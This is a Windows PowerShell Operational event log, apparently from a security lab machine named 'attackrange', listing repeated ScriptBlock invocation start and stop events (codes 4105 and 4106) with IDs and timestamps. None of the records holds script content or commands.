Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479273
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479272
Keywords=None
Message=Started invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479271
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479270
Keywords=None
Message=Completed invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479269
Keywords=None
Message=Started invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479268
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479267
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479266
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479265
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479264
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479263
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479262
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479261
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479260
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479259
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479258
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479257
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479256
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479255
Keywords=None
Message=Completed invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479254
Keywords=None
Message=Started invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479253
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479252
Keywords=None
Message=Started invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479251
Keywords=None
Message=Completed invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479250
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479249
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479248
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479247
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479246
Keywords=None
Message=Started invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479245
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479244
Keywords=None
Message=Completed invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479243
Keywords=None
Message=Started invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479242
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479241
Keywords=None
Message=Completed invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479240
Keywords=None
Message=Started invocation of ScriptBlock ID: 28b0d021-de54-4ece-9f97-e05084174e2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479239
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479238
Keywords=None
Message=Started invocation of ScriptBlock ID: 6acf7ef5-6f9c-406b-a073-9c2ad6e0edec
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479237
Keywords=None
Message=Completed invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479236
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479235
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479234
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479233
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479232
Keywords=None
Message=Started invocation of ScriptBlock ID: ab08d06b-e77b-4ba9-b07f-36e40d1b53cd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479231
Keywords=None
Message=Started invocation of ScriptBlock ID: 8b6d6aa4-57ee-4061-8314-82885b07f2c4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479230
Keywords=None
Message=Completed invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479229
Keywords=None
Message=Started invocation of ScriptBlock ID: 53781394-c176-41ff-b5ee-289ee22c086b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479228
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479227
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479226
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479225
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479224
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479223
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479222
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479221
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479220
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479219
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
